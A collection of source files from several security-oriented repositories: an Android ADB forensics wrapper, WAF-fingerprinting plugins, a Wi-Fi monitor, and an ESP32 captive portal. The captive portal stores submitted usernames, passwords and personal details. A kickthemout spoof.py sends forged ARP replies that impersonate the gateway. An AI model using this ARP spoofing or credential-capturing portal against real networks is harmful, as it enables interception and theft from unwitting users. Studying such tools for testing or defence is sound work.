self.setup(log_level)
def setup(self, log_level):
self.logger = logger
self.logger.setLevel(log_level)
self.logger.debug(f'Platform: {self.platform}')
if self.platform in self.UNIX:
self.adb_bin = self.cmd_shell('which adb') or None
self.logger.debug(f'Using adb binary `{self.adb_bin}`')
else:
self.adb_bin = os.path.join(CODEPATH, 'bin', 'adb.exe')
self._win_startupinfo()
if not self.adb_bin or not os.path.exists(self.adb_bin):
self.logger.warning('ADB binary is not found!')
raise ADBConnError('ADB binary is not found!')
def _win_startupinfo(self):
global startupinfo
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
self.rmr = b'\r\r\n'
@property
def run_opt(self):
opt = {'shell': False, 'startupinfo': startupinfo}
if tuple(sys.version_info) >= (3, 7):
opt['capture_output'] = True
else:
opt['stdout'] = subprocess.PIPE
return opt
@timeout(60 * 60 * 2, use_signals=False)
def adb(self, cmd, binary=False, su=False, **kwargs):
if isinstance(cmd, str):
cmd = shlex.split(cmd)
if su:
cmd.insert(1, 'su -c')
self.logger.debug(f'ADB: {cmd}')
run = subprocess.run([self.adb_bin] + cmd, **self.run_opt)
if run.stdout and run.returncode == 0:
if binary:
return self.unstrip(run.stdout)
return run.stdout.decode().strip()
def adb_iter(self, cmd):
process = subprocess.Popen(
[self.adb_bin] + shlex.split(cmd),
shell=False,
startupinfo=startupinfo,
stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if output == b'' and process.poll() is not None:
break
if output:
yield output.decode().rstrip()
rc = process.poll()
return rc
def device(self):
dev = self.adb('devices', timeout=5)
if dev:
dev = dev.split('\n')
if len(dev) > 1:
dev = dev[1].split('\t')
return dev
else:
self.logger.error('ADB binary cannot be used to check for connected devices!')
return [None, None]
def start(self):
self.adb('start-server', timeout=10)
def kill(self):
self.adb('kill-server', timeout=5)
@staticmethod
def _file_regex(fp):
return re.compile(f"^{fp.replace('*', '(.+?)')}$")
def exists(self, file_path, **kwargs):
file_path_strict = self.strict_name(file_path)
file_remote = self.adb(f'shell ls {file_path_strict}', **kwargs)
if re.match(self._file_regex(file_path), file_remote):
return file_remote
def get_file(self, file_path, **kwargs):
file_path_strict = self.strict_name(file_path)
data = self.adb(f'shell cat {file_path_strict}', binary=True, **kwargs)
return data
def pull_file(self, file_path, dst_path, **kwargs):
file_path_strict = re.sub(' ', r'\ ', file_path)
dst_path_strict = re.sub(' ', r'\ ', dst_path)
self.adb(f"pull {file_path_strict} {dst_path_strict}")
def get_size(self, file_path, **kwargs):
file_path_strict = self.strict_name(file_path)
size = self.adb(f'shell stat -c %s {file_path_strict}', **kwargs)
if not size.isdigit():
size = self.adb(f'shell ls -nl {file_path_strict}', **kwargs).split()[3]
if not size.isdigit():
size = self.adb(f'shell wc -c < {file_path_strict}', **kwargs)
if not size.isdigit():
self.logger.debug(f'Size Error: {size}')
return -1
return int(size)
@timeout(30, use_signals=False)
def cmd_shell(self, cmd, code=False, **kwargs):
self.logger.debug(f'CMD: {cmd}')
run = subprocess.run(shlex.split(cmd), **self.run_opt)
if code:
return run.returncode
else:
if run.stdout:
return run.stdout.decode().strip()
def unstrip(self, data: bytes):
return re.sub(self.rmr, b'\n', data)
def reboot(self, mode=None):
mode = self.MODES.get(mode, '')
self.logger.info(f'Rebooting in {mode}.')
self.adb(f"reboot {mode}", timeout=20)
def __call__(self, cmd, *args, **kwargs):
return self.adb(cmd, *args, **kwargs)
@staticmethod
def strict_name(file_path):
file_name = os.path.split(file_path)[1]
if ' ' in file_name:
return file_path.replace(file_name, repr(file_name).replace(' ', r'\ '))
return file_path
class ADBConnError(Exception):
pass
```
#### File: andriller/tests/test_config.py
```python
import os
import time
import shutil
import pytest
import tempfile
from andriller import config
from andriller import __version__
@pytest.fixture
def c():
os.environ['HOME'] = tempfile.mkdtemp()
yield config.Config()
shutil.rmtree(os.environ['HOME'])
def test_config_funcs(c):
assert c.NS == 'DEFAULT'
n = int(time.time())
x = c.hex_time_now()
assert type(x) == str and len(x) == 8
assert c.time_from_hex(x) in range(n, n + 1)
@pytest.mark.parametrize('key,current,new', [
('version', __version__, '9.9.9'),
('update_rate', '100000', '2000000'),
('theme', '', 'clam'),
])
def test_update_records(c, key, current, new):
assert c(key) == current
c.update_conf(**{c.NS: {key: new}})
assert c(key) == new
``` |
{
"source": "84KaliPleXon3/bni-api",
"score": 2
} |
#### File: 84KaliPleXon3/bni-api/setup.py
```python
import setuptools
import re
with open('README.md', 'r') as fh:
long_description = fh.read()
def get_version():
with open('bni_api/__init__.py') as f:
v = re.findall(r'__version__ = \'(.+?)\'', f.read())[0]
return v
setuptools.setup(
name="bni_api",
version=get_version(),
author="loncat",
author_email="<EMAIL>",
description=
"A Python wrapper for some of BNI's internet banking functionalities.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/p4kl0nc4t/bni_api",
packages=setuptools.find_packages(),
install_requires=['requests', 'requests_html'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: MIT License",
"Operating System :: OS Independent",
],
)
``` |
{
"source": "84KaliPleXon3/ColdCore",
"score": 2
} |
#### File: ColdCore/routes/scoreboard.py
```python
from flask import Blueprint, render_template
from utils import cache
import data
import config
scoreboard = Blueprint("scoreboard", __name__, template_folder="../templates/scoreboard")
@scoreboard.route('/scoreboard/')
def index():
scoreboard_data = cache.get_complex("scoreboard")
graph_data = cache.get_complex("graph")
if scoreboard_data is None or graph_data is None:
if config.immediate_scoreboard:
scoreboard_data = scoreboard.calculate_scores()
graph_data = scoreboard.calculate_graph(data)
cache.set_complex("scoreboard", scoreboard_data, 120)
cache.set_complex("graph", graph_data, 120)
else:
return "CTF hasn't started!"
return render_template("scoreboard.html", data=scoreboard_data, graphdata=graph_data)
``` |
{
"source": "84KaliPleXon3/Devil-s-Call",
"score": 2
} |
#### File: 84KaliPleXon3/Devil-s-Call/banner.py
```python
RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, YELLOW2, GREEN2 = '\033[1;91m', '\033[46m', '\033[1;36m', '\033[1;32m', '\033[3;0m' , '\033[1;33m' , '\033[1;93m', '\033[1;92m'
def banner():
kill='''
{5}██████{0}╗ {5}███████{0}╗{5}██{0}╗ {5}██{0}╗{5}██{0}╗{5}██{0}╗ {5}█{0}╗ {5}███████{0}╗ {5}██████{0}╗ {5}█████{0}╗ {5}██{0}╗ {5}██{0}╗
{5}██{0}╔══{5}██{0}╗{5}██{0}╔════╝{5}██{0}║ {5}██{0}║{5}██{0}║{5}██{0}║ {0}╚╝ {5}██{0}╔════╝ {5}██{0}╔════╝{5}██{0}╔══{5}██{0}╗{5}██{0}║ {5}██{0}║
{5}██{0}║ {5}██{0}║{5}█████{0}╗ {5}██{0}║ {5}██{0}║{5}██{0}║{5}██{0}║ {5}███████{0}╗ {5}██{0}║ {5}███████{0}║{5}██{0}║ {5}██{0}║
{5}██{0}║ {5}██{0}║{5}██{0}╔══╝ ╚{5}██{0}╗ {5}██╔{0}╝{5}██{0}║{5}██{0}║ ╚════{5}██{0}║ {5}██{0}║ {5}██{0}╔══{5}██{0}║{5}██{0}║ {5}██{0}║
{5}██████{0}╔╝{5}███████{0}╗ ╚{5}████{0}╔╝ {5}██{0}║{5}███████{0}╗ {5}███████{0}║ ╚{5}██████{0}╗{5}██{0}║ {5}██{0}║{5}███████{0}╗{5}███████{0}╗
╚═════╝ ╚══════╝ ╚═══╝ ╚═╝╚══════╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝
'''.format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW)
print("\t\t\t{2}U R GOING TO MAKE A{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW))
print(kill)
``` |
{
"source": "84KaliPleXon3/EnableSecurity-wafw00f",
"score": 2
} |
#### File: wafw00f/plugins/f5bigipasm.py
```python
NAME = 'BIG-IP AppSec Manager (F5 Networks)'
def is_waf(self):
schemes = [
self.matchContent('the requested url was rejected'),
self.matchContent('please consult with your administrator')
]
if all(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/f5bigipltm.py
```python
NAME = 'BIG-IP Local Traffic Manager (F5 Networks)'
def is_waf(self):
schemes = [
self.matchCookie('^bigipserver'),
self.matchHeader(('X-Cnection', 'close'), attack=True)
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/imunify360.py
```python
NAME = 'Imunify360 (CloudLinux)'
def is_waf(self):
schemes = [
self.matchHeader(('Server', r'imunify360.{0,10}?')),
self.matchContent(r'protected.by.{0,10}?imunify360'),
self.matchContent(r'powered.by.{0,10}?imunify360'),
self.matchContent(r'imunify360.preloader')
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/radware.py
```python
NAME = 'AppWall (Radware)'
def is_waf(self):
schema1 = [
self.matchContent(r'CloudWebSec\.radware\.com'),
self.matchHeader(('X-SL-CompState', '.+'))
]
schema2 = [
self.matchContent(r'because we have detected unauthorized activity'),
self.matchContent(r'<title>Unauthorized Request Blocked'),
self.matchContent(r'if you believe that there has been some mistake'),
self.matchContent(r'\?Subject=Security Page.{0,10}?Case Number')
]
if any(i for i in schema1):
return True
if all(i for i in schema2):
return True
return False
```
#### File: wafw00f/plugins/secureiis.py
```python
NAME = 'eEye SecureIIS (BeyondTrust)'
def is_waf(self):
schemes = [
self.matchContent(r'SecureIIS is an internet security application'),
self.matchContent(r'Download SecureIIS Personal Edition'),
self.matchContent(r'https?://www\.eeye\.com/Secure\-?IIS')
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/sitelock.py
```python
NAME = 'Sitelock (TrueShield)'
# Well this is confusing, Sitelock itself uses Incapsula from Imperva
# So the fingerprints obtained on blockpage are similar to those of Incapsula.
def is_waf(self):
schemes = [
self.matchContent(r"SiteLock will remember you"),
self.matchContent(r"Sitelock is leader in Business Website Security Services"),
self.matchContent(r"sitelock[_\-]shield([_\-]logo|[\-_]badge)?"),
self.matchContent(r'SiteLock incident ID')
]
if any(i for i in schemes):
return True
return False
```
#### File: wafw00f/plugins/viettel.py
```python
NAME = 'Viettel (Cloudrity)'
def is_waf(self):
schemes = [
self.matchContent(r"Access Denied.{0,10}?Viettel WAF"),
self.matchContent(r"cloudrity\.com\.(vn)?/"),
self.matchContent(r"Viettel WAF System")
]
if any(i for i in schemes):
return True
return False
``` |
{
"source": "84KaliPleXon3/esp32-uPyPortal",
"score": 2
} |
#### File: esp32-uPyPortal/captive_portal/__main__.py
```python
from .app import app
from . import views
from .dns import DNSServer
import gc
def main(**params):
gc.collect()
import logging
logging.basicConfig(level=logging.INFO)
# Preload templates to avoid memory fragmentation issues
gc.collect()
app._load_template('homepage.html')
app._load_template('admin.html')
app._load_template('login.html')
gc.collect()
import micropython
micropython.mem_info()
gc.collect()
# starting dns server
dns_server = DNSServer(**params)
dns_server.start()
gc.collect()
# webserver
app.run(debug=True, **params)
if __name__ == '__main__':
main()
```
#### File: esp32-uPyPortal/captive_portal/models_filedb.py
```python
from ucollections import OrderedDict
import filedb as uorm
db = uorm.DB("login-db")
class LoginData(uorm.Model):
__db__ = db
__table__ = "login"
__schema__ = OrderedDict([
("timestamp", ("TIMESTAMP", uorm.now)),
("archived", ("INT", 0)),
("username", ("TEXT", "")),
("password", ("TEXT", "")),
("email", ("TEXT", "")),
("street", ("TEXT", "")),
("city", ("TEXT", "")),
("postcode", ("TEXT", "")),
("country", ("TEXT", "")),
("mobile", ("TEXT", "")),
("content", ("TEXT", "")),
])
@classmethod
def mapkeys(cls, obj):
return [obj.get(k) for k in cls.__schema__.keys()]
@classmethod
def public(cls):
res = [x for x in cls.scan() if x.archived == 0]
res.sort(key=lambda x: x.timestamp, reverse=True)
return res
```
#### File: 84KaliPleXon3/esp32-uPyPortal/setup_sta_upip.py
```python
import network
import gc
ssid_ = 'FRITZBoxLeMa'
wp2_pass = '<PASSWORD>'
sta_if = []
def do_connect():
global sta_if
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
print('connecting to network...')
sta_if.active(True)
sta_if.connect(ssid_, wp2_pass)
while not sta_if.isconnected():
pass
print('network config:', sta_if.ifconfig())
# connecting to WiFi
do_connect()
gc.collect()
# installing dependencies
# import upip
# upip.install('picoweb')
# gc.collect()
# upip.install('micropython-logging')
# gc.collect()
# upip.install('utemplate')
# gc.collect()
# upip.install('micropython-pkg_resources')
# gc.collect()
# upip.install('micropython-btreedb')
# gc.collect()
### ftp server for loading files
from ftp import ftpserver
ftp_server = ftpserver()
ftp_server.start_thread()
import captive_portal.__main__
captive_portal.__main__.main(host=sta_if.ifconfig()[0], port=80)
``` |
{
"source": "84KaliPleXon3/IoT-Implant-Toolkit",
"score": 3
} |
#### File: core/basic/__init__.py
```python
import sys
import argparse
#from os import geteuid
class Plugin:
def __init__(self, **kwargs):
self.name = kwargs["name"]
self.usage = kwargs["usage"]
self.classname = kwargs["classname"]
self.description = kwargs["description"]
self.author = kwargs["author"]
self.ref = kwargs["ref"]
self.category = kwargs["category"]
self.needroot = kwargs["needroot"] if ("needroot" in kwargs.keys()) else False
self.argparser = argparse.ArgumentParser(prog=self.name, description=self.description)
self.args = None
def execute(self):
pass
def intro(self):
print("{:<15} {}".format("Plugin:", self.name))
#print("{:<15} {}".format("Author:", self.author))
print("{:<15} {}".format("Description:", self.description))
print("{:<15} {}".format("Reference:", self.ref))
print("{:<15} {}".format("Category:", self.category))
print("{:<15} {}".format("Usage:", self.usage))
print()
def run(self, arglist):
self.args = self.argparser.parse_args(arglist)
self.intro()
self.execute()
```
#### File: plugins/firmware/mksquashfs.py
```python
import os
from toolkit.core.basic import Plugin
class MkSquashfs(Plugin):
'''
inherit from class Plugin
'''
def __init__(self):
super().__init__(name = "mksquashfs",
description = "pack&unpack for squashfs filesystem",
classname = "MkSquashfs",
author = "Plougher",
ref = "https://github.com/plougher/squashfs-tools",
category = "Firmware Pack&Unpack",
usage = 'Run "run mksquashfs" will compress outputs/squashfs-root/ to new.squashfs .Run "run mksquashfs help" to see more parameters.')
self.argparser.add_argument("--input", default="./outputs/squashfs-root/", help="squashfs dir")
self.argparser.add_argument("--output", default="./outputs/new.squashfs", help="new squashfs file")
self.argparser.add_argument("--comp", default="xz", help="compress method")
def execute(self):
#print("Run mksquashfs with parameter {}".format(str(self.args)))
os.system("mksquashfs {} {} -comp {} -noappend -always-use-fragments".format(self.args.input, self.args.output, self.args.comp))
``` |
{
"source": "84KaliPleXon3/kickthemout",
"score": 2
} |
#### File: 84KaliPleXon3/kickthemout/spoof.py
```python
import sys, logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import (
get_if_hwaddr,
getmacbyip,
ARP,
Ether,
sendp,
conf,
RadioTap,
Dot11,
Dot11Deauth
)
# send malicious ARP packets
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
``` |
{
"source": "84KaliPleXon3/kismon",
"score": 2
} |
#### File: kismon/kismon/tracks.py
```python
import time
import json
import os
import collections
class Tracks:
def __init__(self, tracks_file):
self.tracks = {}
self.tracks_file = tracks_file
self.starttime = int(time.time())
def load(self):
if not os.path.isfile(self.tracks_file):
return
with open(self.tracks_file, 'r') as f:
self.tracks = json.load(f)
def save(self):
new_file = "%s.new" % self.tracks_file
with open(new_file, 'w') as f:
json.dump(self.tracks, f)
os.rename(new_file, self.tracks_file)
def add_point_to_track(self, track_name, lat, lon, alt):
if track_name not in self.tracks:
self.tracks[track_name] = {}
timestamp = int(time.time())
self.tracks[track_name][str(timestamp)] = (lat, lon, alt)
def group_to_sessions(self, filter_time):
sessions = {}
timeout = 600
for track_name in self.tracks:
sessions[track_name] = collections.OrderedDict()
track = self.tracks[track_name]
timestamps = list(track.keys())
timestamps.sort()
first_timestamp = 0
previous_timestamp = 0
session = collections.OrderedDict()
for timestamp in timestamps:
point = track[timestamp]
timestamp = int(timestamp)
if timestamp < filter_time:
continue
if timestamp - previous_timestamp > timeout:
if len(session) > 0:
sessions[track_name][first_timestamp] = session
session = collections.OrderedDict()
first_timestamp = timestamp
session[timestamp] = point
previous_timestamp = timestamp
if len(session) > 0:
sessions[track_name][first_timestamp] = session
return sessions
def export_kml(self, export_filter):
if export_filter == 'current':
filter_time = self.starttime
else:
filter_time = 0
output = ["<Folder><name>Tracks</name>"]
sessions = self.group_to_sessions(filter_time)
time_format = "%a %b %d %H:%M:%S %Y"
for track_name in sessions:
output.append("<Folder><name>%s</name>" % track_name)
for session_start in sessions[track_name]:
output.append(
"<Placemark><Style><LineStyle><color>7f00ff00</color><width>3</width></LineStyle></Style><LineString><coordinates>\n")
for timestamp in sessions[track_name][session_start]:
lat, lon, alt = sessions[track_name][session_start][timestamp]
output.append("%s,%s \n" % (lon, lat))
output.append("</coordinates></LineString>")
output.append("<name>Session %s - %s</name></Placemark>\n" % (
time.strftime(time_format, time.gmtime(session_start)),
time.strftime(time_format, time.gmtime(timestamp)),
))
output.append("</Folder>")
output.append("</Folder>")
return "".join(output)
```
#### File: kismon/widgets/networklist.py
```python
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository import GObject
from gi.repository import GLib
import kismon.utils as utils
class NetworkList:
def __init__(self, networks, locate_network_on_map, on_signal_graph, config):
self.network_lines = {}
self.network_iter = {}
self.network_selected = None
self.locate_network_on_map = locate_network_on_map
self.on_signal_graph = on_signal_graph
self.networks = networks
self.config = config
self.value_cache = {}
for key in ('time', 'crypt', 'server', 'type', 'channel', 'signal', 'ssid'):
self.value_cache[key] = {}
self.networks.notify_add_list["network_list"] = self.add_network
self.networks.notify_remove_list["network_list"] = self.remove_network
self.networks.disable_refresh_functions.append(self.pause)
self.networks.resume_refresh_functions.append(self.resume)
self.treeview = Gtk.TreeView()
num = 0
self.enabled_columns = {}
self.columns = ("BSSID", "Type", "SSID", "Ch", "Crypt",
"First Seen", "Last Seen", "Latitude", "Longitude",
"Signal dbm", "Comment", "Servers")
self.available_columns = {}
if len(self.config['network_list_columns']) == 0:
self.config['network_list_columns'] = list(self.columns)
for column in self.columns:
renderer = Gtk.CellRendererText()
if column == "Comment":
renderer.set_property('editable', True)
renderer.connect("editing-started", self.on_comment_editing_started)
elif column == "Signal dbm":
renderer = Gtk.CellRendererProgress()
tvcolumn = Gtk.TreeViewColumn(column, renderer, text=num)
self.available_columns[column] = tvcolumn
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.set_sort_column_id(num)
tvcolumn.set_clickable(True)
tvcolumn.set_resizable(True)
tvcolumn.set_reorderable(True)
if column == "Signal dbm":
tvcolumn.add_attribute(renderer, "value", 12)
num += 1
self.treeview.insert_column(tvcolumn, 0) # the button only gets created when the column is inserted
tvcolumbutton = tvcolumn.get_button()
tvcolumbutton.connect('button-press-event', self.on_column_clicked, num)
self.treeview.remove_column(tvcolumn) # the columns get added again in the right order
# read the column list from the config to preserve their order
for column in self.config['network_list_columns']:
self.add_column(column)
self.treeview.connect("button-press-event", self.on_treeview_clicked) # has to be done after TreeViewColumn's
self.treeview.connect("columns-changed", self.on_columns_changed)
self.treeview.show()
self.store = Gtk.ListStore(
GObject.TYPE_STRING, # mac
GObject.TYPE_STRING, # type
GObject.TYPE_STRING, # ssid
GObject.TYPE_INT, # channel
GObject.TYPE_STRING, # cryptset
GObject.TYPE_STRING, # firsttime
GObject.TYPE_STRING, # lasttime
GObject.TYPE_FLOAT, # lat
GObject.TYPE_FLOAT, # lon
GObject.TYPE_INT, # signal dbm
GObject.TYPE_STRING, # comment
GObject.TYPE_STRING, # servers
GObject.TYPE_INT, # signal dbm + 100 (progressbar)
)
self.treeview.set_model(self.store)
scrolled = Gtk.ScrolledWindow()
scrolled.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scrolled.add(self.treeview)
frame = Gtk.Frame()
frame.set_label("Networks")
frame.add(scrolled)
self.scrolled_window = scrolled
self.widget = frame
self.store.set_sort_column_id(6, Gtk.SortType.DESCENDING)
network_popup = Gtk.Menu()
locate_item = Gtk.MenuItem.new_with_label('Copy field')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_field)
locate_item = Gtk.MenuItem.new_with_label('Copy network')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_network)
locate_item = Gtk.MenuItem.new_with_label('Locate on map')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_locate_marker)
signal_item = Gtk.MenuItem.new_with_label('Signal graph')
network_popup.append(signal_item)
signal_item.connect("activate", self.on_signal_graph)
network_popup.show_all()
self.network_popup = network_popup
self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)
self.treeview_click_event = None
def add_column(self, column):
if column not in self.config["network_list_columns"]:
# Position the column next to its original neighbor column as defined in self.columns.
# If that column is not enabled, go further to the left.
x = 1
while True:
left_column_position = self.columns.index(column) - x
if self.columns[left_column_position] in self.config["network_list_columns"]:
break
if x < 0:
break
x += 1
column_position = left_column_position + 1
self.config["network_list_columns"].insert(column_position, column)
else:
column_position = self.config["network_list_columns"].index(column)
self.treeview.insert_column(self.available_columns[column], column_position)
self.enabled_columns[column] = self.available_columns[column]
def remove_column(self, column):
self.treeview.remove_column(self.enabled_columns[column])
del self.enabled_columns[column]
self.config["network_list_columns"].remove(column)
def on_column_clicked(self, widget, event, num=None):
self.treeview_click_event = event
if event.button == 1: # left click
self.treeview.set_search_column(num)
elif event.button == 3: # right click
self.open_column_popup(event)
def on_columns_changed(self, widget):
columns = self.treeview.get_columns()
if len(columns) != len(self.enabled_columns):
# when the widget gets destroyed, the event is triggered after each column was removed
return
new_list = []
for column in columns:
new_list.append(column.get_title())
self.config["network_list_columns"] = new_list
def open_column_popup(self, event):
column_popup = Gtk.Menu()
for column in self.available_columns:
item = Gtk.CheckMenuItem.new_with_label(column)
column_popup.append(item)
if column in self.enabled_columns:
item.activate()
item.connect("activate", self.on_column_activated, column)
column_popup.show_all()
column_popup.popup_at_pointer(event)
def on_column_activated(self, widget, column):
active = widget.get_active()
if active:
self.add_column(column)
else:
self.remove_column(column)
def on_comment_editing_started(self, widget, editable, path):
editable.connect("editing-done", self.on_comment_editing_done)
def on_comment_editing_done(self, widget):
network = self.networks.get_network(self.network_selected)
network['comment'] = widget.get_text()
self.add_network(self.network_selected)
def prepare_network_servers(self, value):
if len(value) == 0 or value is None:
servers = None
else:
servers = []
for server in value:
if server.endswith(':2501'): # remove the default port
server = server.rsplit(':', 1)[0]
servers.append(server)
servers_str = ", ".join(sorted(servers))
try:
servers = self.value_cache['server'][servers_str]
except KeyError:
servers = GObject.Value(GObject.TYPE_STRING, servers_str)
self.value_cache['server'][servers_str] = servers
return servers
def prepare_network_time(self, value):
try:
result = self.value_cache['time'][value]
except KeyError:
result = GObject.Value(GObject.TYPE_STRING, utils.format_timestamp(value))
self.value_cache['time'][value] = result
return result
def prepare_network_crypt(self, value):
try:
crypt = self.value_cache['crypt'][value]
except KeyError:
crypt = GObject.Value(GObject.TYPE_STRING, value)
self.value_cache['crypt'][value] = crypt
return crypt
def prepare_network_channel(self, value):
try:
channel = self.value_cache['channel'][value]
except KeyError:
channel = GObject.Value(GObject.TYPE_INT, value)
self.value_cache['channel'][value] = channel
return channel
def prepare_network_type(self, value):
try:
network_type = self.value_cache['type'][value]
except KeyError:
network_type = GObject.Value(GObject.TYPE_STRING, value)
self.value_cache['type'][value] = network_type
return network_type
def prepare_network_signal(self, value):
try:
return self.value_cache['signal'][value]
except KeyError:
pass
""" Wifi cards report different ranges for the signal, some use
-1xx to 0 and others 0 to 100. The CellRendererProgress needs a
percentage value between 0 and 100, so we convert the value if
necessary.
"""
if -100 <= value <= 0:
signal_strength = value + 100
elif value < -100:
signal_strength = 0
elif 1 <= value <= 100:
signal_strength = value
else:
signal_strength = 0
signal = GObject.Value(GObject.TYPE_INT, value)
signal_strength = GObject.Value(GObject.TYPE_INT, signal_strength)
self.value_cache['signal'][value] = (signal, signal_strength)
return signal, signal_strength
def prepare_network_ssid(self, value):
if value == "":
ssid_str = "<no ssid>"
else:
ssid_str = value
try:
ssid = self.value_cache['ssid'][ssid_str]
except KeyError:
ssid = GObject.Value(GObject.TYPE_STRING, ssid_str)
self.value_cache['ssid'][ssid_str] = ssid
return ssid
@staticmethod
def prepare_network_coordinate(value):
if value == 0.0:
return None
else:
return value
def add_network(self, mac):
network = self.networks.get_network(mac)
""" The Gtk.ListStore will convert every Python-type value to its
GObject equivalent. Most of the prepare_network_* functions cache
and return the value as a GObject, this speed things up as we have
a lot of duplicate values. Furthermore a None value is faster then
an zero size string, so we replace it where possible.
"""
if "signal_dbm" not in network or len(network["signal_dbm"]) != 3:
signal = 0
else:
signal = network["signal_dbm"]["last"]
signal, signal_strength = self.prepare_network_signal(signal)
if network['comment'] == '':
comment = None
else:
comment = network['comment']
line = [mac,
self.prepare_network_type(network["type"]),
self.prepare_network_ssid(network["ssid"]),
self.prepare_network_channel(network["channel"]),
self.prepare_network_crypt(network["crypt"]),
self.prepare_network_time(network["firsttime"]),
self.prepare_network_time(network["lasttime"]),
self.prepare_network_coordinate(network["lat"]),
self.prepare_network_coordinate(network["lon"]),
signal,
comment,
self.prepare_network_servers(network["servers"]),
signal_strength
]
try:
old_line = self.network_lines[mac]
except:
old_line = None
self.network_lines[mac] = line
if mac in self.network_iter:
network_iter = self.network_iter[mac]
num = 0
for value in line:
if old_line is not None and old_line.pop(0) == value:
num += 1
continue
self.store.set_value(network_iter, num, value)
num += 1
else:
self.network_iter[mac] = self.store.append(line)
# stick to the top of the table after adding a new row
adj = self.scrolled_window.get_vadjustment()
self.scroll_value = int(adj.get_value())
if self.scroll_value == 0:
GLib.idle_add(self.treeview.scroll_to_point, -1, 0)
def remove_network(self, mac):
try:
network_iter = self.network_iter[mac]
except KeyError:
return
self.store.remove(network_iter)
del (self.network_iter[mac])
def pause(self):
self.treeview.freeze_child_notify()
self.treeview.set_model(None)
def resume(self):
self.treeview.set_model(self.store)
self.treeview.thaw_child_notify()
def on_treeview_clicked(self, treeview, event):
if self.treeview_click_event == event:
return
x = int(event.x)
y = int(event.y)
pthinfo = treeview.get_path_at_pos(x, y)
if pthinfo is None:
return
path, col, cellx, celly = pthinfo
treeview.grab_focus()
treeview.set_cursor(path, col, 0)
network_iter = self.store.get_iter(path)
mac = self.store.get_value(network_iter, 0)
self.network_selected = mac
self.column_selected = self.columns.index(col.get_title())
if event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS: # double click
self.on_locate_marker(None)
elif event.button == 3: # right click
self.network_popup.popup(None, None, None, 0, event.button, event.time, )
def on_locate_marker(self, widget):
if self.locate_network_on_map is not None:
self.locate_network_on_map(self.network_selected)
def on_copy_field(self, widget):
selected_text = self.get_value_from_cell(self.network_selected, self.column_selected)
self.set_clipboard(selected_text)
def on_copy_network(self, widget):
text = []
num = 0
for column in self.available_columns:
value = self.get_value_from_cell(self.network_selected, num)
text.append("%s: %s" % (column, value))
num += 1
self.set_clipboard('\n'.join(text))
def set_clipboard(self, text):
self.clipboard.set_text("%s" % text, -1)
self.clipboard.store()
def get_value_from_cell(self, mac, column):
value = self.network_lines[mac][column]
try:
value = value.get_value()
except AttributeError:
pass
return value
```
#### File: kismon/windows/channel.py
```python
from gi.repository import Gtk
class ChannelWindow:
def __init__(self, sources, client_thread, parent):
self.sources = sources
self.client_thread = client_thread
self.changes = {}
self.widgets = {}
self.gtkwin = Gtk.Window()
self.gtkwin.set_transient_for(parent)
self.gtkwin.set_position(Gtk.WindowPosition.CENTER)
self.gtkwin.set_default_size(320, 240)
self.gtkwin.set_title("Configure Channel")
self.vbox = None
self.sources_list = None
self.init_box()
def init_box(self):
vbox = Gtk.VBox()
vbox.set_property('margin', 5)
self.sources_list = Gtk.VBox()
sources_list_scroll = Gtk.ScrolledWindow()
sources_list_scroll.add(self.sources_list)
sources_list_scroll.get_children()[0].set_shadow_type(Gtk.ShadowType.NONE)
sources_list_scroll.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
vbox.pack_start(sources_list_scroll, True, True, 0)
for uuid in self.sources:
self.widgets[uuid] = {}
source = self.sources[uuid]
frame = Gtk.Frame()
frame.set_label(source['name'])
self.sources_list.pack_start(frame, False, False, 0)
table = Gtk.Table(n_rows=3, n_columns=3)
frame.add(table)
hop_button = Gtk.RadioButton.new_with_label_from_widget(None, 'Hop')
if source["hop"] > 0:
hop_button.clicked()
hop_button.connect("clicked", self.on_change_mode, uuid, "hop")
hop_button.set_property("xalign", 0)
hop_button.set_property("yalign", 0.4)
table.attach(hop_button, 0, 1, 0, 1)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(3)
field.set_increments(1, 10)
field.set_range(1, 100)
field.set_value(source["hop_rate"])
if source["hop"] == 0:
field.set_sensitive(False)
self.widgets[uuid]["hop"] = field
field.connect("changed", self.on_change_value, uuid, "hop")
table.attach(field, 1, 2, 0, 1, xoptions=Gtk.AttachOptions.SHRINK)
label = Gtk.Label(label="rate")
label.set_justify(Gtk.Justification.LEFT)
label.set_property("xalign", 0.1)
label.set_property("yalign", 0.5)
table.attach(label, 2, 3, 0, 1, xoptions=Gtk.AttachOptions.FILL)
lock_button = Gtk.RadioButton.new_with_label_from_widget(hop_button, "Lock")
if source["hop"] == 0:
lock_button.clicked()
lock_button.connect("clicked", self.on_change_mode, uuid, "lock")
lock_button.set_property("xalign", 0)
lock_button.set_property("yalign", 0.4)
